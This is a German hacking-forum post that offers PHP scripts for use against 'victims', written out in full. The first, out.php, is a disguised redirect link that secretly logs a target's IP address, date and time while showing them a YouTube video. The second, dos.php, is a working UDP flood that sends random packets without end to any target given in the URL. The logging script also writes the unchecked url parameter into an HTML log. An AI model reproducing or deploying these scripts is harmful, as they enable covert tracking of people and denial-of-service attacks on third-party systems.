So hab mich mal bissl nützlich gemacht und ein warscheinlich unnützes PHP Script geschrieben um die IP Adresse eines Victims rauszubekommen.
Funktionsweise:
Ihr gebt dem Victim eine Url per out.php?url=http://de.youtube.com/watch?v=qi_BX5cmreE über. Das Victim sieht nur diese Seite hier
http://de.youtube.com/watch?v=qi_BX5cmreE. Im Hintergrund wurde die IP geloggt in "iplog/ip.html" .
Wenn ihr die ip.html aufruft seht ihr die
die Zeit des Logs
das Datum des Logs
die IP des Victims
Außerdem sind gleich links generiert worden um eine
dos-attacke über euren PHP Server auszuführen
ein whois, trace oder scan durch Netcraft zu machen.
Ich versichere euch das es nicht verseucht ist =)
Entweder ihr ladet euch das script bei Rapidshare runter (ignoriert die "rs-punkt" Datei die ist nur da damit ich ein paar Punkte bei Rapidshare kriege um das Archiv zu vergrößern )
Downloadlink: http://rapidshare.com/files/14140572...4free-hack.zip
oder ihr benutzt den Code hier :
out.php
Code:
<?php
//logfile adresse
$logfile = "iplog/ip.html";
//IP
$ip = $_SERVER['REMOTE_ADDR'];
//Zeit
$zeit = date("H:i:s");
//Datum
$datum = date("d.m.Y");
//IP Log
$text = "Neue IP geloggt - [".$ip."] am [".$datum."] um [".$zeit."] Uhr | Weiterleitung führte zu [url='".$_GET[url]."']".$_GET." | IP DOS | whois | Trace Netcraft Scan
";
$fp = fopen($logfile, "a");
fwrite($fp, $text);
fclose($fp);
//Weiterleitung
if($_GET[url]==NULL){
echo "Und wohin soll ich jetzt weiterleiten du Ei?";
}else{
header("Location: ".$_GET[url]."");
}
?>
dos.php
Code:
<?php
if (!$_GET['target'])
die('Kein Ziel angegeben!');
$target = $_GET['target'];
$sock = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
if(!$sock)
die(__LINE__);
$data='';
for ($i=0;$i<1400;$i++)
{
$data.=chr(rand(0,255));
}
while(true)
{
if (!socket_sendto($sock,$data,strlen($data),0,$target,9))
die(__LINE__);
$time = date("H:i:s");
echo("$time | DOS läuft
");
}
?>
Hoffe konnte bissl helfen =)